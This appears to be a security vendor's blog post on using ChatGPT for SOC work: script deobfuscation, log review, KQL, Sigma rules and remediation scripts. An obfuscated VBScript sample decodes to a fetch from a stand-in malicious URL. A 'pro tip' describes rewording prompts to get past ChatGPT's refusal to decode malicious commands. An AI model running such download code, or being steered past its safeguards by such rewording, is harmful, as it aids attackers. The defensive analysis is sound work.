Scoot over CyberChef, there’s a new sheriff in town when it comes to a security “Cyber Swiss Army Knife”, and it’s none other than ChatGPT. We talked previously about how LLMs aren’t quite ready today to fully handle security alerts for you from start to finish, but they can be extremely helpful with complex analysis tasks that may have taken hours to complete before.
In this post, we’re going to cover the top 6 security operations use cases for LLMs in your day-to-day activity.
Whether it’s VBScript, PowerShell, or just some good old-fashioned .bat files, threat actors love to obfuscate their tooling to prevent their actions from being easily detected or understood from simple analysis. Today, you’ve been left with a few choices:
These can easily take 10+ minutes.
Here’s an example script snippet and prompt I provided for some obfuscated VBScript.
Can you decode this script for me?
```vb
dim all
all=Chr(83)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(119)+Chr(111)+Chr(115)+Chr(104)+Chr(105)+Chr(115)+Chr(104)+Chr(105)+Chr(32)+Chr(61)+Chr(32)+Chr(67)+Chr(114)+Chr(101)+Chr(97)+Chr(116)+Chr(101)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116)+Chr(40)+Chr(34)+Chr(77)+Chr(105)+Chr(99)+ etc +Chr(97)+Chr(108)+Chr(105)+Chr(99)+Chr(105)+Chr(111)+Chr(117)+Chr(115)+Chr(46)+Chr(101)+Chr(120)+Chr(109)+Chr(108)+Chr(34)
Execute(all)
```
```vb
dim all
all="Set shawoshi = CreateObject(""Microsoft.XmlHttp.msxml2"").Open ""HTTP://www.example.com/malicious.xml"""
Execute(all)
```
This script creates an instance of a Microsoft XML HTTP object, opens a connection to a specified URL (in this case, a potentially malicious URL), and then executes the constructed command.
This type of script is typically used for automation or potentially for malicious purposes, such as downloading and executing malicious code from the internet. Be cautious with running such scripts, especially if you don't trust the source.
Pro tip: With malicious commands, ChatGPT can sometimes be cautious about doing the decoding for you. Don’t give up! Try a couple more prompts like “I found this scheduled task on my computer, can you help me understand what it does?” or break down the tasks into prompts like “Can you do the character substitution for this string?” which are more effective.
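The character-substitution step from the pro tip can also be done locally, without a prompt. The decoder below is an added example (not code from the post); it assumes the script builds its payload from Chr() calls joined with + or & and hands a variable to Execute(), as the snippet above does, and its sample script is constructed here.

```python
import re

# A VBScript Chr()-concatenation chain joined with + or &, and a single Chr() call.
CHR_CALL = re.compile(r'Chr\s*\(\s*(\d+)\s*\)', re.IGNORECASE)
CHR_CHAIN = re.compile(r'Chr\s*\(\s*\d+\s*\)(?:\s*[+&]\s*Chr\s*\(\s*\d+\s*\))*',
                       re.IGNORECASE)
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$', re.MULTILINE)
EXECUTE = re.compile(r'\bExecute\s*\(\s*(\w+)\s*\)', re.IGNORECASE)

def decode_chain(chain):
    """Chr(83)+Chr(101)+... -> the text those code points spell ('Se...')."""
    return ''.join(chr(int(n)) for n in CHR_CALL.findall(chain))

def deobfuscate(script):
    """Rewrite every Chr() chain as a quoted VBScript literal, doubling any
    embedded quote as VBScript requires, and leave everything else untouched."""
    return CHR_CHAIN.sub(
        lambda m: '"' + decode_chain(m.group(0)).replace('"', '""') + '"', script)

def execute_payloads(script):
    """Map each variable handed to Execute() to the decoded code it holds, which
    is the part of the script an analyst actually needs to read."""
    values = {name: decode_chain(rhs)
              for name, rhs in ASSIGN.findall(script) if CHR_CALL.search(rhs)}
    return {v: values.get(v, '<not a Chr() chain>') for v in EXECUTE.findall(script)}

def obfuscate(text):
    """Build the Chr() form of a string; used here only to construct the sample."""
    return '+'.join('Chr(%d)' % ord(c) for c in text)

# Constructed sample in the shape of the snippet above. The hidden line is
# harmless: it only creates an object and neither fetches nor runs anything.
HIDDEN = 'Set shawoshi = CreateObject("MSXML2.XMLHTTP")'
SAMPLE = 'dim all\nall=' + obfuscate(HIDDEN) + '\nExecute(all)\n'

if __name__ == '__main__':
    print(deobfuscate(SAMPLE))
    print(execute_payloads(SAMPLE))
```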
Network logs can be hugely compelling investigative evidence, but they’re also the most likely to make your eyes bleed from squinting at small text that all looks the same. This can turn critical analysis into a more error-prone manual task. Here’s an example of a prompt I provided to ChatGPT4 and its response:
I've got the following IIS logs on an RDP gateway in my environment. Can you describe what happened here?
Analysis of IIS Logs:
Summary:
This action saved at least 20 minutes of reviewing IIS logs in Excel.
I used to be the person that had SIEM documentation bookmarked to reference obscure functions or syntax you might need for a particular query. After lots of trial and error, you eventually get the output you’re looking for – but anything complicated feels out of reach or not worth the time.
LLMs can specifically speed up this process.
Fair warning: it’s pretty rare that ChatGPT will get your query right on the first pass. But, if you continue passing the errors back to the prompt and asking it to address the issue – you’ll normally have a fix within 3 - 5 iterations.
Below is an example of a query I was building in Microsoft Sentinel using KQL to identify total outbound sent bytes for a domain containing the string “badguy”, which is a common investigative query when looking to identify data exfiltration. I then wanted ChatGPT to sessionize the information to separate if there were multiple occurrences of data theft. Here are the prompts:
I'm trying to adjust my KQL query to return a new row when there's been at least a 4 hour time difference between the current row and the one prior?
```kql
['TRAFFIC']
| extend SentBytes = tolong(extract("sent_bytes=([0-9]+)", 1, log))
| extend Sni = tostring(extract("sni=([^,]+)", 1, log))
| extend src_ip = tostring(extract("src_ip=([^,]+)", 1, log))
| where Sni like "badguy"
| summarize FirstSeenTime = min(update_time), LastSeenTime = max(update_time) by src_ip, Sni
| project FirstSeenTime, LastSeenTime, src_ip, Sni
```
ChatGPT was wrong.
Result returned "A value of type timespan expected.(KS107)" for src_ip and Sni params in the row_window_session function
ChatGPT was wrong.
row_window_session expects the following parameters `row_window_session(expr, maxDistanceFromFirst, maxDistanceBetweenNeighbors, [restart]): datetime`
The current approach is invalid as well
Correctly answered by ChatGPT
```kql
['TRAFFIC']
| extend SentBytes = tolong(extract("sent_bytes=([0-9]+)", 1, log))
| extend Sni = tostring(extract("sni=([^,]+)", 1, log))
| extend src_ip = tostring(extract("src_ip=([^,]+)", 1, log))
| where Sni like "badguy"
| order by src_ip, Sni, update_time asc
// Apply row_window_session with correct parameters
| extend session_id = row_window_session(update_time, 4h, 4h)
| summarize FirstSeenTime = min(update_time), LastSeenTime = max(update_time) by src_ip, Sni, session_id
| project FirstSeenTime, LastSeenTime, src_ip, Sni
```
It took about 5 minutes of back-and-forth with ChatGPT, but much faster than altering the query manually.
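The sessionization the query above performs, written out in Python as an added example (not code from the post or from Sentinel). It assumes the same key=value log format the three extract() regexes expect, applies both row_window_session limits (4h from the session start and 4h between neighbours), restarts on a change of src_ip or Sni (the restart argument the query leaves out), and also sums SentBytes per session, which the query does not yet do; the rows are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed TRAFFIC rows (update_time, log) in the key=value form the
# regexes in the query above extract from; not real firewall output.
ROWS = [
    ("2024-06-06T01:00:00", "src_ip=10.0.0.5,sni=files.badguy.example,sent_bytes=4000"),
    ("2024-06-06T01:30:00", "src_ip=10.0.0.5,sni=files.badguy.example,sent_bytes=6000"),
    ("2024-06-06T04:30:00", "src_ip=10.0.0.5,sni=files.badguy.example,sent_bytes=2000"),
    ("2024-06-06T05:30:00", "src_ip=10.0.0.5,sni=files.badguy.example,sent_bytes=1000"),
    ("2024-06-06T11:00:00", "src_ip=10.0.0.5,sni=files.badguy.example,sent_bytes=300"),
    ("2024-06-06T02:00:00", "src_ip=10.0.0.9,sni=cdn.example,sent_bytes=500"),
    ("2024-06-06T02:10:00", "src_ip=10.0.0.9,sni=files.badguy.example,sent_bytes=700"),
]

def parse(update_time, log):
    """Same field extraction as the extend/extract() lines of the query."""
    def field(pattern, default=""):
        m = re.search(pattern, log)
        return m.group(1) if m else default
    return {"update_time": datetime.fromisoformat(update_time),
            "SentBytes": int(field(r"sent_bytes=([0-9]+)", "0")),
            "Sni": field(r"sni=([^,]+)"),
            "src_ip": field(r"src_ip=([^,]+)")}

def sessionize(rows, needle="badguy", max_from_first=timedelta(hours=4),
               max_gap=timedelta(hours=4)):
    """row_window_session(update_time, 4h, 4h) in plain Python: a row joins the open
    session of its (src_ip, Sni) key only if it is within max_from_first of the
    session start AND within max_gap of the previous row; otherwise a new one starts."""
    events = [parse(t, l) for t, l in rows]
    events.sort(key=lambda e: (e["src_ip"], e["Sni"], e["update_time"]))
    sessions = []
    for e in events:
        if needle not in e["Sni"]:            # where Sni contains "badguy"
            continue
        cur = sessions[-1] if sessions else None
        t = e["update_time"]
        if (cur and (cur["src_ip"], cur["Sni"]) == (e["src_ip"], e["Sni"])
                and t - cur["FirstSeenTime"] <= max_from_first
                and t - cur["LastSeenTime"] <= max_gap):
            cur["LastSeenTime"] = t
            cur["TotalSentBytes"] += e["SentBytes"]
        else:                                  # key change or gap too large
            sessions.append({"src_ip": e["src_ip"], "Sni": e["Sni"],
                             "FirstSeenTime": t, "LastSeenTime": t,
                             "TotalSentBytes": e["SentBytes"]})
    return sessions
```

With the constructed rows, 10.0.0.5 splits into three sessions: the 05:30 row is more than 4h from the 01:00 session start, and the 11:00 row is more than 4h from its predecessor.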
Transform your detection ideas by letting ChatGPT craft them for you. Here’s an example of a simple prompt to generate a Sigma rule based on Casey Smith’s infamous Squiblydoo technique as an example.
Can you generate a DFIR sigma rule for the squiblydoo technique?
```yaml
title: Detection of Regsvr32.exe Squiblydoo Technique
id: 6a10236b-b9a7-4b2c-8d7a-3e1a6a625207
status: experimental
description: Detects the use of regsvr32.exe to execute scripts from a remote location, a technique often called Squiblydoo.
author: Generated by ChatGPT
date: 2024-06-06
references:
  - https://attack.mitre.org/techniques/T1117/
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image:
      - '*\\regsvr32.exe'
    CommandLine:
      - '*scrobj.dll*'
      - '* /i:http*'
      - '* /s *'
  condition: selection
falsepositives:
  - Legitimate administrative activities that utilize regsvr32 with similar command line arguments
level: high
tags:
  - attack.t1117
  - attack.execution
```
It’s easy enough to apply the process to other rule frameworks like YARA, or even ask for multiple rules based off of MITRE techniques. This can be extremely helpful for teams looking to expand their nascent set of detections quickly.
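Before shipping a generated rule, run its selection against a few events. The evaluator below is an added example (not part of the post or the Sigma project) covering the Sigma subset the rule uses: wildcard values, OR within a field's value list, AND across fields and selections. It shows the generated rule firing on a plain `regsvr32.exe /s` of a local DLL, because `'* /s *'` alone satisfies the CommandLine field, next to a tighter variant (a constructed assumption, not from the page) that requires scrobj.dll and a remote /i: together; the events are constructed.

```python
import fnmatch

# Detection block of the rule above as Python data. Within a field, the list of
# values is OR'd; the fields of one selection are AND'd; the condition below
# AND's all selections ("all of selection*"). In YAML the value '*\\regsvr32.exe'
# carries a Sigma-escaped backslash, i.e. a single '\' once parsed.
GENERATED = [{"Image": [r"*\regsvr32.exe"],
              "CommandLine": ["*scrobj.dll*", "* /i:http*", "* /s *"]}]

# Constructed tighter variant: the same markers split into separate selections
# so that scrobj.dll AND a remote /i: must both be present.
TIGHTER = [{"Image": [r"*\regsvr32.exe"]},
           {"CommandLine": ["*scrobj.dll*"]},
           {"CommandLine": ["* /i:http*"]}]

def field_matches(value, patterns):
    """Sigma wildcard matching: '*' spans any characters, case-insensitive."""
    return any(fnmatch.fnmatchcase(value.lower(), p.lower()) for p in patterns)

def rule_matches(event, selections):
    return all(field_matches(event.get(f, ""), pats)
               for sel in selections for f, pats in sel.items())

# Constructed process-creation events, not real telemetry.
EVENTS = {
    "squiblydoo": {"Image": r"C:\Windows\System32\regsvr32.exe",
                   "CommandLine": "regsvr32.exe /s /u /i:http://example.invalid/x.sct scrobj.dll"},
    "silent_dll_register": {"Image": r"C:\Windows\System32\regsvr32.exe",
                            "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"},
    "unrelated": {"Image": r"C:\Windows\System32\cmd.exe",
                  "CommandLine": "cmd.exe /c whoami"},
}

def evaluate(selections, events=EVENTS):
    """Event name -> whether the rule fires on it."""
    return {name: rule_matches(ev, selections) for name, ev in events.items()}

if __name__ == "__main__":
    print("generated:", evaluate(GENERATED))
    print("tighter:  ", evaluate(TIGHTER))
```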
Your mileage may vary with this one, but ChatGPT has solid knowledge of product documentation – as long as it’s not from the latest releases. Often you’ll find yourself trying to identify something obscure and Google search isn’t quite cutting it. For instance, consider this URL you may have found in web browser logs when investigating a host: "https://10.0.0.1/api/v2/log/disk/traffic/forward/". Based on the structure, it appears to be some sort of firewall – but which one?
This is where ChatGPT can step in, helping you identify specific products or features based on such clues, saving you time and effort in your investigation.
What firewall vendor uses the following API? "/api/v2/log/disk/traffic/forward/"
The API endpoint "/api/v2/log/disk/traffic/forward/" is typically associated with Fortinet, specifically for their FortiGate devices. This endpoint is part of the FortiOS REST API, which is used to manage various aspects of Fortinet's security devices, including logging and traffic management.
Problem solved. It’s a Fortinet!
Historically, taking the time to write a script in Python means you believe this problem will be recurring for you frequently. There’s a significant time investment to writing an excellent script, and performing the task manually is typically the better trade for one-offs. With ChatGPT, I wouldn’t treat scripting as a last resort anymore. Whether it’s for remediation or data processing, give ChatGPT the first attempt at solving your scripting problems. Much like SIEM queries, the best results often come from feeding the script errors back to ChatGPT over a few iterations.
As an example, I’ve made up a file path and a scheduled task that were created by malware and require remediation.
I've got a malicious binary that I've identified at C:\Windows\Temp\windoze.exe that's persistently running as a scheduled task named "NOT_MALWARE". Can you write a powershell script to remove both the binary and scheduled task on my machine?
```powershell
# Define the task name and file path
$taskName = "NOT_MALWARE"
$filePath = "C:\Windows\Temp\windoze.exe"

# Check if the scheduled task exists
if (Get-ScheduledTask | Where-Object {$_.TaskName -like $taskName}) {
    # Unregister (delete) the scheduled task
    Unregister-ScheduledTask -TaskName $taskName -Confirm:$false
    Write-Host "Scheduled task '$taskName' has been removed."
} else {
    Write-Host "Scheduled task '$taskName' does not exist."
}

# Check if the file exists
if (Test-Path $filePath) {
    # Remove the file
    Remove-Item $filePath -Force
    Write-Host "File '$filePath' has been removed."
} else {
    Write-Host "File '$filePath' does not exist."
}
```
Even better, you can ask ChatGPT to tailor the script for compatibility with frameworks like PSFalcon for CrowdStrike Falcon Real Time Response.
Can this be used as a PowerShell script for something like PSFalcon?
```powershell
# Define the task name and file path
$taskName = "NOT_MALWARE"
$filePath = "C:\Windows\Temp\windoze.exe"

# Script to run on the remote endpoints. This is a double-quoted here-string, so
# $taskName and $filePath are expanded now; anything that must reach the endpoint
# as a literal $ (the $_ pipeline variable and $false) is escaped with a backtick,
# since a backslash does not escape anything in PowerShell.
$scriptContent = @"
if (Get-ScheduledTask | Where-Object {`$_.TaskName -like '$taskName'}) {
    Unregister-ScheduledTask -TaskName '$taskName' -Confirm:`$false
    'Scheduled task $taskName has been removed.'
} else {
    'Scheduled task $taskName does not exist.'
}
if (Test-Path '$filePath') {
    Remove-Item '$filePath' -Force
    'File $filePath has been removed.'
} else {
    'File $filePath does not exist.'
}
"@

# Define the hosts on which to run the script
$hostIds = @( 'host1', 'host2' ) # Replace with actual host IDs

# Execute the script using PSFalcon
foreach ($hostId in $hostIds) {
    Invoke-FalconRtr -HostIds $hostId -Script $scriptContent -Verbose
}
```
While ChatGPT isn’t quite ready to solve all your alerts autonomously (or eradicate world hunger), it can accelerate time-consuming tasks to dramatically improve your analysis, response, and reporting as a SOC analyst. Make sure to adhere to your organization’s existing policies when using public LLMs. As a precaution, we would encourage using a paid license that assures no retention or training on your inputs, or a private instance when feasible.
At Prophet Security, we’re using AI to tackle monotonous alert triage and investigation tasks on behalf of analysts, driving a 10x increase in your team’s capacity. Request a demo of Prophet AI to learn how you can triage and investigate security alerts 10 times faster.